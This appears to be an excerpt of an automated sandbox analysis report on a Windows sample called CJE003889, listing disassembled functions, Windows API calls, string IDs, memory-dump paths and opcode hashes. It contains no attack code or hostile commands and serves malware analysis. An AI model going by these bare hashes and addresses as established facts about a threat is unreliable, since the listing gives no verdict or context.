                                                          • GetSysColor.USER32(0000000F), ref: 00C621D3
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: ColorLongWindow
                                                          • String ID:
                                                          • API String ID: 259745315-0
                                                          • Opcode ID: 1a35f2a965f0dcbca9a6882633f12e915c2188d1be22dcc2360e61289bb53419
                                                          • Instruction ID: cd8e9e35d24d04fa7b6513262a3a56f9d33b2124a5fb7e2373a5bb62fc89c307
                                                          • Opcode Fuzzy Hash: 1a35f2a965f0dcbca9a6882633f12e915c2188d1be22dcc2360e61289bb53419
                                                          • Instruction Fuzzy Hash: 12416D31005944ABDB255F28ECD8BBD3B65EB46331F148269FE658E1E5C7318E42DB21
                                                          APIs
                                                          • CharLowerBuffW.USER32(?,?,00CEF910), ref: 00CCA90B
                                                          • GetDriveTypeW.KERNEL32(00000061,00D189A0,00000061), ref: 00CCA9D5
                                                          • _wcscpy.LIBCMT ref: 00CCA9FF
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: BuffCharDriveLowerType_wcscpy
                                                          • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                          • API String ID: 2820617543-1000479233
                                                          • Opcode ID: 034637756aa61ca1caae19cfa2c879859603839332e655b9d7cee97f4e943c25
                                                          • Instruction ID: 7e75e4a5c0688686b8405b87b35c3afb9cd945bfb51487827583348ca86f2767
                                                          • Opcode Fuzzy Hash: 034637756aa61ca1caae19cfa2c879859603839332e655b9d7cee97f4e943c25
                                                          • Instruction Fuzzy Hash: E751AB31108305ABC314EF14D896FAFB7A9EF84708F14482DF496572A2DB319A49EB53
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: __i64tow__itow__swprintf
                                                          • String ID: %.15g$0x%p$False$True
                                                          • API String ID: 421087845-2263619337
                                                          • Opcode ID: 524e446463546f37733bb1d0517e7de1c2c415b5975722f7888924935a7ec203
                                                          • Instruction ID: e6cf1c7675260c05a0c316c7adb9a538bb9ebb61c1e99d157487ee45c09758ab
                                                          • Opcode Fuzzy Hash: 524e446463546f37733bb1d0517e7de1c2c415b5975722f7888924935a7ec203
                                                          • Instruction Fuzzy Hash: 5E411471500205AFEF24EF75D886E7A73E8FF49314F20486EE559D7292EA31AA42DB10
                                                          APIs
                                                          • _memset.LIBCMT ref: 00CE716A
                                                          • CreateMenu.USER32 ref: 00CE7185
                                                          • SetMenu.USER32(?,00000000), ref: 00CE7194
                                                          • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00CE7221
                                                          • IsMenu.USER32(?), ref: 00CE7237
                                                          • CreatePopupMenu.USER32 ref: 00CE7241
                                                          • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00CE726E
                                                          • DrawMenuBar.USER32 ref: 00CE7276
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                                                          • String ID: 0$F
                                                          • API String ID: 176399719-3044882817
                                                          • Opcode ID: a29c43d957349c333adb5b6a15e515bab2113d830e21b239f80e5187414e3316
                                                          • Instruction ID: 44ecf5ac7e1aec08a8f554b05a03e74888c569dd7292390b64525dc3a987f698
                                                          • Opcode Fuzzy Hash: a29c43d957349c333adb5b6a15e515bab2113d830e21b239f80e5187414e3316
                                                          • Instruction Fuzzy Hash: 9E415875A01245EFDB20DF65E884FAABBB5FF58310F144129FA15AB361D731AA10CFA0
                                                          APIs
                                                          • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 00CE755E
                                                          • CreateCompatibleDC.GDI32(00000000), ref: 00CE7565
                                                          • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00CE7578
                                                          • SelectObject.GDI32(00000000,00000000), ref: 00CE7580
                                                          • GetPixel.GDI32(00000000,00000000,00000000), ref: 00CE758B
                                                          • DeleteDC.GDI32(00000000), ref: 00CE7594
                                                          • GetWindowLongW.USER32(?,000000EC), ref: 00CE759E
                                                          • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 00CE75B2
                                                          • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 00CE75BE
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                          • String ID: static
                                                          • API String ID: 2559357485-2160076837
                                                          • Opcode ID: a1fab4737500cf47c30d7b07dcd5aa6e679c98536a42dce902bc270059249c40
                                                          • Instruction ID: d8a85cc18a2caa779a0f3ffdb930e14fb7741329e4872a873592dd699558b651
                                                          • Opcode Fuzzy Hash: a1fab4737500cf47c30d7b07dcd5aa6e679c98536a42dce902bc270059249c40
                                                          • Instruction Fuzzy Hash: 49316C32105298BBDF129F65DC49FEF3B69EF09320F110329FA25961A0C731D912DBA4
                                                          APIs
                                                          • _memset.LIBCMT ref: 00C86E3E
                                                            • Part of subcall function 00C88B28: __getptd_noexit.LIBCMT ref: 00C88B28
                                                          • __gmtime64_s.LIBCMT ref: 00C86ED7
                                                          • __gmtime64_s.LIBCMT ref: 00C86F0D
                                                          • __gmtime64_s.LIBCMT ref: 00C86F2A
                                                          • __allrem.LIBCMT ref: 00C86F80
                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00C86F9C
                                                          • __allrem.LIBCMT ref: 00C86FB3
                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00C86FD1
                                                          • __allrem.LIBCMT ref: 00C86FE8
                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00C87006
                                                          • __invoke_watson.LIBCMT ref: 00C87077
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                          • String ID:
                                                          • API String ID: 384356119-0
                                                          • Opcode ID: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
                                                          • Instruction ID: 09e1ffc88ef66b734fe0d966893b67d1c8afd71db0a35470724b832a501c61bb
                                                          • Opcode Fuzzy Hash: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
                                                          • Instruction Fuzzy Hash: 9C711776A00717ABDB14FE68DC85B6AB7A8AF0432CF14422AF524D7681FB70DE409794
                                                          APIs
                                                          • _memset.LIBCMT ref: 00CC2542
                                                          • GetMenuItemInfoW.USER32(00D25890,000000FF,00000000,00000030), ref: 00CC25A3
                                                          • SetMenuItemInfoW.USER32(00D25890,00000004,00000000,00000030), ref: 00CC25D9
                                                          • Sleep.KERNEL32(000001F4), ref: 00CC25EB
                                                          • GetMenuItemCount.USER32(?), ref: 00CC262F
                                                          • GetMenuItemID.USER32(?,00000000), ref: 00CC264B
                                                          • GetMenuItemID.USER32(?,-00000001), ref: 00CC2675
                                                          • GetMenuItemID.USER32(?,?), ref: 00CC26BA
                                                          • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00CC2700
                                                          • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00CC2714
                                                          • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00CC2735
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                                          • String ID:
                                                          • API String ID: 4176008265-0
                                                          • Opcode ID: 33155058c7a27473fe8c6d1f55cff8426edb2e0435f7e14ceb94eeaabbb414ca
                                                          • Instruction ID: 01478d88ac74b32f59a0464525b417ca8ea0bf8b6a7c13cfbc45b09da2a59a54
                                                          • Opcode Fuzzy Hash: 33155058c7a27473fe8c6d1f55cff8426edb2e0435f7e14ceb94eeaabbb414ca
                                                          • Instruction Fuzzy Hash: E8617B74900649AFDB21CF64D888FBEBBB8EB45304F14046DF852A7291D731AE46DB31
                                                          APIs
                                                          • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00CE6FA5
                                                          • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00CE6FA8
                                                          • GetWindowLongW.USER32(?,000000F0), ref: 00CE6FCC
                                                          • _memset.LIBCMT ref: 00CE6FDD
                                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00CE6FEF
                                                          • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00CE7067
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$LongWindow_memset
                                                          • String ID:
                                                          • API String ID: 830647256-0
                                                          • Opcode ID: 92091b28659597434d1f1841c022218276d893333664132e6a5f3ace7dd81e7f
                                                          • Instruction ID: 3b3e8ab6e720d1c67211396852663ac02f4ab8c19f5c2f51490c4a6d312ec5a5
                                                          • Opcode Fuzzy Hash: 92091b28659597434d1f1841c022218276d893333664132e6a5f3ace7dd81e7f
                                                          • Instruction Fuzzy Hash: 35617B75900288AFDB21DFA5DC81EEE77F8EB08710F100159FA14EB2A1C771AE41DBA0
                                                          APIs
                                                          • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00CB6BBF
                                                          • SafeArrayAllocData.OLEAUT32(?), ref: 00CB6C18
                                                          • VariantInit.OLEAUT32(?), ref: 00CB6C2A
                                                          • SafeArrayAccessData.OLEAUT32(?,?), ref: 00CB6C4A
                                                          • VariantCopy.OLEAUT32(?,?), ref: 00CB6C9D
                                                          • SafeArrayUnaccessData.OLEAUT32(?), ref: 00CB6CB1
                                                          • VariantClear.OLEAUT32(?), ref: 00CB6CC6
                                                          • SafeArrayDestroyData.OLEAUT32(?), ref: 00CB6CD3
                                                          • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00CB6CDC
                                                          • VariantClear.OLEAUT32(?), ref: 00CB6CEE
                                                          • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00CB6CF9
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                          • String ID:
                                                          • API String ID: 2706829360-0
                                                          • Opcode ID: 73b79424faf9e812ca015bd0e8c10ae305764beff4c8866c8586fb197392a5ae
                                                          • Instruction ID: 040310bdcf36f09d781a89b48d3c56c908251e01f962ccd726248f047889f159
                                                          • Opcode Fuzzy Hash: 73b79424faf9e812ca015bd0e8c10ae305764beff4c8866c8586fb197392a5ae
                                                          • Instruction Fuzzy Hash: 744133759001199FDF10DFA4D884EEEBBB9EF48354F008079E955EB2A1CB34AA46DF90
                                                          APIs
                                                            • Part of subcall function 00C69837: __itow.LIBCMT ref: 00C69862
                                                            • Part of subcall function 00C69837: __swprintf.LIBCMT ref: 00C698AC
                                                          • CoInitialize.OLE32 ref: 00CD8403
                                                          • CoUninitialize.OLE32 ref: 00CD840E
                                                          • CoCreateInstance.OLE32(?,00000000,00000017,00CF2BEC,?), ref: 00CD846E
                                                          • IIDFromString.OLE32(?,?), ref: 00CD84E1
                                                          • VariantInit.OLEAUT32(?), ref: 00CD857B
                                                          • VariantClear.OLEAUT32(?), ref: 00CD85DC
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                                          • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                          • API String ID: 834269672-1287834457
                                                          • Opcode ID: 9a55c1a3f224015cab0e61b098ff3a594c30ffee6ec8b9aca0a5090c5a09eda6
                                                          • Instruction ID: 7a181d7a2e43e079f32b2ca7b8e5348c4ad0eb46f3f1f7b32a3fc18241e5e5d3
                                                          • Opcode Fuzzy Hash: 9a55c1a3f224015cab0e61b098ff3a594c30ffee6ec8b9aca0a5090c5a09eda6
                                                          • Instruction Fuzzy Hash: EE618970608312AFD710DF55D888B6EB7E8AF49754F00441EFA829B391DB70EE48DB92
                                                          APIs
                                                          • WSAStartup.WSOCK32(00000101,?), ref: 00CD5793
                                                          • inet_addr.WSOCK32(?,?,?), ref: 00CD57D8
                                                          • gethostbyname.WSOCK32(?), ref: 00CD57E4
                                                          • IcmpCreateFile.IPHLPAPI ref: 00CD57F2
                                                          • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00CD5862
                                                          • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00CD5878
                                                          • IcmpCloseHandle.IPHLPAPI(00000000), ref: 00CD58ED
                                                          • WSACleanup.WSOCK32 ref: 00CD58F3
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                          • String ID: Ping
                                                          • API String ID: 1028309954-2246546115
                                                          • Opcode ID: c037e060aff4073ae97fa712cca4fa8959b167d47bd673bd20f46aa6829df994
                                                          • Instruction ID: 179529ba0bfccc8abcb79a77dfca0f21d771499713a71cf1c6aed9b38eed9ef9
                                                          • Opcode Fuzzy Hash: c037e060aff4073ae97fa712cca4fa8959b167d47bd673bd20f46aa6829df994
                                                          • Instruction Fuzzy Hash: E9516C716447009FDB209F25DC85B6ABBE4EF48710F14452AFA66DB3E1DB30E905EB41
                                                          APIs
                                                          • SetErrorMode.KERNEL32(00000001), ref: 00CCB4D0
                                                          • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00CCB546
                                                          • GetLastError.KERNEL32 ref: 00CCB550
                                                          • SetErrorMode.KERNEL32(00000000,READY), ref: 00CCB5BD
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: Error$Mode$DiskFreeLastSpace
                                                          • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                          • API String ID: 4194297153-14809454
                                                          • Opcode ID: 4f6eebbcf4c9d165e2006abcf8b2c355c874bb994d000e6f3d1913e62f19679f
                                                          • Instruction ID: 294d45aaa1b307d2ae7f575c284c1d3f46bad057304a3bfef77026b14e084287
                                                          • Opcode Fuzzy Hash: 4f6eebbcf4c9d165e2006abcf8b2c355c874bb994d000e6f3d1913e62f19679f
                                                          • Instruction Fuzzy Hash: 9031AD35A00209EFCB10EBE8D986FAEBBB4FF48310F10812DE5119B291DB719E46DB50
                                                          APIs
                                                            • Part of subcall function 00C67DE1: _memmove.LIBCMT ref: 00C67E22
                                                            • Part of subcall function 00CBAA99: GetClassNameW.USER32(?,?,000000FF), ref: 00CBAABC
                                                          • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 00CB9014
                                                          • GetDlgCtrlID.USER32 ref: 00CB901F
                                                          • GetParent.USER32 ref: 00CB903B
                                                          • SendMessageW.USER32(00000000,?,00000111,?), ref: 00CB903E
                                                          • GetDlgCtrlID.USER32(?), ref: 00CB9047
                                                          • GetParent.USER32(?), ref: 00CB9063
                                                          • SendMessageW.USER32(00000000,?,?,00000111), ref: 00CB9066
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                          • String ID: ComboBox$ListBox
                                                          • API String ID: 1536045017-1403004172
                                                          • Opcode ID: 11a3b2f6f2da6452896d70e028d842f06ee836e2f1b4961fbc370b9211681096
                                                          • Instruction ID: a592c7266d7847e1ef5de38b8ec32d5a25e5bb51b40e31fb49e2ccbad85a1047
                                                          • Opcode Fuzzy Hash: 11a3b2f6f2da6452896d70e028d842f06ee836e2f1b4961fbc370b9211681096
                                                          • Instruction Fuzzy Hash: 5421CF70A00148BBDF14ABA0CCC5FFEBB78EF59310F104119B961972A1DB79591AEA20
                                                          APIs
                                                            • Part of subcall function 00C67DE1: _memmove.LIBCMT ref: 00C67E22
                                                            • Part of subcall function 00CBAA99: GetClassNameW.USER32(?,?,000000FF), ref: 00CBAABC
                                                          • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 00CB90FD
                                                          • GetDlgCtrlID.USER32 ref: 00CB9108
                                                          • GetParent.USER32 ref: 00CB9124
                                                          • SendMessageW.USER32(00000000,?,00000111,?), ref: 00CB9127
                                                          • GetDlgCtrlID.USER32(?), ref: 00CB9130
                                                          • GetParent.USER32(?), ref: 00CB914C
                                                          • SendMessageW.USER32(00000000,?,?,00000111), ref: 00CB914F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                          • String ID: ComboBox$ListBox
                                                          • API String ID: 1536045017-1403004172
                                                          • Opcode ID: 3d71918e05ba3997656e97dc96ec85f131bdba060dd65d08b5b44525c30f5b01
                                                          • Instruction ID: 85934c398ad127d2ccffddb521298d08194af4db73aec95789c97f5179d7b898
                                                          • Opcode Fuzzy Hash: 3d71918e05ba3997656e97dc96ec85f131bdba060dd65d08b5b44525c30f5b01
                                                          • Instruction Fuzzy Hash: 6921C874A00148BBDF11ABA4CCC5FFEBB78EF48300F104119B551972A1DB79595AEB20
                                                          APIs
                                                          • GetParent.USER32 ref: 00CB916F
                                                          • GetClassNameW.USER32(00000000,?,00000100), ref: 00CB9184
                                                          • _wcscmp.LIBCMT ref: 00CB9196
                                                          • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00CB9211
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: ClassMessageNameParentSend_wcscmp
                                                          • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                          • API String ID: 1704125052-3381328864
